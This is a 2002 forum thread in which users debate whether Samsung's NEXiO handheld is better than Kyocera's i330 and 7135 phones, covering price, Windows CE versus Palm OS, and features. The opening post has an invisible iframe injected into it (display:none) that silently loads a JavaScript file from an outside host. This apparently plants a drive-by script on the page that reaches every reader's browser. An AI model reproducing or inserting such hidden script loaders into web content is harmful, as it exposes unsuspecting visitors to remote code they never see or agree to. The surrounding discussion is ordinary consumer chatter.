+ Reply to Thread
Page 1 of 2 1 2 LastLast

NEXiO is waay better than i330 or 7135

Why isn't anyone talking about the Samsung NEXiO? It is waaaay better than the i330 or 7135. It has an MP3 player, a 5 inch screen with (800*400 resolution) a GPS and digital camera function, it comes with Pocket Word, Excel, Powerpoint and Media Player! Go to www.samsungelectronics.com/pda/index.html and find out more. I keep hearing everyone talking about the Kyocera 7135 and how good it is, but no one is talking about the NEXiO. Even the i330 is better than the 7135. I prefer the touch screen to an actual dial pad anyday... it's cooler lookin<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Did you happen to search fpor Nexio on our forum first? There has been some talk about the Nexio here and one of our members actually purchased it and gave us quite a nice review. I believe I posted pics of the unit back in December. Most of our members here prefer the Palm OS and further spent roughly $300 for their I300s as opposed to the ($700) selling price of the Nexio found in 0 stores.

Napoleon Bonaparte Jr.

Hello

NEXiO - cool toy !

But , is it a smartphone ?

Couse , if its not a phone , I do not need it .

And I like my I 300 becouse of the size first , and

I can feet it in my back jeens packet .

NEXiO looks bigger .
    Attached Thumbnails Attached Thumbnails NEXiO is waay better than i330 or 7135-pic_nex01.gif  

Administrator

Arrow

windows CE.. no thanks...

What is wrong with Windows? How can you ignore all the things the NEXiO does?
    Last edited by AllEyezOnMe; 07-28-2002 at 01:22 PM.

sprint, the Nexio is a phone as well.

Alleyez, how can you make a statement such as you have without knowing the pros and cons of both windows and palm?

Also, I believe all previous attempts to compare the 300 to pricier "competitors" have resulted in the agreement that you can't compare a $700 product to a $500 product. Were the 300 $700, might it share some of the bonuses listed?

What do you have, by the way.

Administrator

Arrow

i dont want to see the familiar blue error screen all the time while im out..

seriously, why pay 700 bucks for something that looks like a laptop? all i need is a PHONE with internet and 3G capability.. in a small size. the i330 does that just fine. and its 200 bucks less...

options?

do i buy the nexio? when it hits the states, i mean... if anyone has found this thing stateside, please tell me.. it was released in korea already and is getting good reviews. i'm not too sure about the i330 vs 7135 \ the 7135 has so much more to offer, SD slot 16Mb vice 8Mb. but when the nexio hits i think it will be the next big thing. look around on a search engine there's a microsoft case study on it... samsung looks like they're putting alot of effort into the nexio... should be fun.
    runnin' in circles....

Mjorange, I can make that type of statement because I know that the NEXiO has more features. I'm just going off of looks and features and the fact that it has Word, which will help me alot with my notes in school. I had been using the Memo pad on my I300 to take notes in class, so Word will definitely be an upgrade. But could you please enlighten me, on the pros and cons of Windows CE and Palm?

I bought my I300 the very first day it was available online. I think it's the greatest phone of all time. And if I had to do it all over again, and the price was $800, I'd pay it.

I understand there's a $350 price difference between the NEXiO (which is actually selling for $850 in Korea, not $700) and the I330, but I honestly think the NEXiO is a better comparison to the I330 than the Kyocera 7135, because the NEXiO uses a touch screen dialpad. It's a totally different look. If you want to compare the 7135 to anything, compare it to Samsung's upcoming Bluechip phone, which looks EXACTLY like the 7135 and will have just about the same features.

Like many of you here, I'm always looking to have the "latest and greatest" before anyone else. If a phone looks really cool, Mission Impossible or James Bond cool, I'm buying it... So until the NEXiO comes out in December, I'll be using the I330... Is anyone else buying the NEXiO?
    Last edited by AllEyezOnMe; 07-28-2002 at 01:40 PM.

Napoleon Bonaparte Jr.

Hello

Question ...

What's the difference between NEXiO win CE VERSION 3

and Pocket PC ?

As I know , Windows CE is a PREversion of Pocket PC .

Probably is better to buy the Pocket PC Smartphone ...

I honestly think the NEXiO is a better comparison to the I330 than the Kyocera 7135, because the NEXiO uses a touch screen dialpad. It's a totally different look. If you want to compare the 7135 to anything, compare it to Samsung's upcoming Bluechip phone, which looks EXACTLY like the 7135 and will have just about the same features.
    I am a bit bequiled by the quoted statement. You feel the Nexio is a more fair comparison merely because it shares a touch screen dialpad? Secondly, the 7135 is Palm based while the Bluechip is not. I hardly call that "just about the same features" my friend. That alone voids any attempt of justifying a comparison. Lastly, as far as wanting a phone with a total different look, I agree. We have all agreed upon the shock factor of the I300. Is the same shock factor not presented by the 7135, however, when others learn of its Palm OS?

I don't mean to pic on you Alleyez, but I feel the need to address these points.

I understand Mjorange, it's all good... But like I said, I'm just going off of L O O K S and F E A T U R E S. If this is still too confusing for you, let me give you a simple example. Let's say I want to buy a truck. If I want to, I can compare the Chevrolet 1500 with a V6 engine, to the 2500 HD with a V8 engine. You know why? Because they both LOOK similar and they both have similar FEATURES. The fact that they use different engines doesn't mean that I can't compare the two. Do you see where I'm going with this?

I'm not too into the technical stuff. And to be honest with you, I don't really care what OS it's running. All I know is that Bill Gates is a bad muthaf****.
    It's Samsung and Microsoft... How can you go wrong?

I just want my phone to look cool and do alot of different things. So as far as I'm concerned, the NEXiO is way better than the I330. It's just my opinion. You may not agree, but I'm sure there are others that feel the same way I do.

By the way, I don't mean to pick on you Mjorange, but I feel the need to address these points so I don't beguile you anymore.
    Last edited by AllEyezOnMe; 07-28-2002 at 01:25 PM.

Originally posted by mjorange

I am a bit bequiled by the quoted statement. You feel the Nexio is a more fair comparison merely because it shares a touch screen dialpad? Secondly, the 7135 is Palm based while the Bluechip is not. I hardly call that "just about the same features" my friend. That alone voids any attempt of justifying a comparison. Lastly, as far as wanting a phone with a total different look, I agree. We have all agreed upon the shock factor of the I300. Is the same shock factor not presented by the 7135, however, when others learn of its Palm OS?

I don't mean to pic on you Alleyez, but I feel the need to address these points.
    "Bluechip" IS palm based. I think you meant the Nexio is not palm based.

Thanks Concept. I stand corrected. I was actually thinking of the Samsung A500 however, which is not Palm based. Other than that, my view has not changed regarding the comparison of the Nexio to the 300/330. Or rather, while I do see it ok to compare the two, I don't feel the two are in the same class.

BTW Alleyez, have you purchased any word software for the 300 yet? Docs to Go, QuickOffice, etc.?

Yeah, just recently. But I haven't been able to use it in class yet because I'm on vacation. And the fact that the NEXiO already comes with Word, is yet another example of the additional features I'm talking about.
    Last edited by AllEyezOnMe; 07-28-2002 at 01:48 PM.

nexio, word. december?

if any one has a link for release dates and prices for the nexio, could you please post them.. all i can find is "in 2002" with no price determined. who will carry it? i'm assuming sprint.

also for you guys wanting word. check out quick office.. i use it for word and excel for reprts and inventories, the excel docs are a bit of a pain due to the small screen but i like it.... i might have a copy laying around i can send you if you need it..
    runnin' in circles....

Last edited by AllEyezOnMe; 07-28-2002 at 03:26 PM.

Man, I think you need to take another look

I've read a few reviews and I've seen them say "voice capability" but I'm wondering why the Samsung website says nothing of it... It's being pushed as a next generation PDA... Definately not a "Smartphone".... We'll see when we get closer to its launch date... If it does have voice capability, you won't want to use it as your main voice device...

no more gripes...

http://www.forbes.com/2002/01/15/0115tentech.html

sentence before last paragraph... you can make calls... it is a phone... it is a puter... just read an article on the recall of the nexio in korea, something to do with the battery life while using the wireless modem... il post if i run across it again.. maybe this should be changed to "smartphone forum".. we seem to be getting away from the i300's lately. i wonder how much better palmVNC will run on a 3G palm phone?
    runnin' in circles....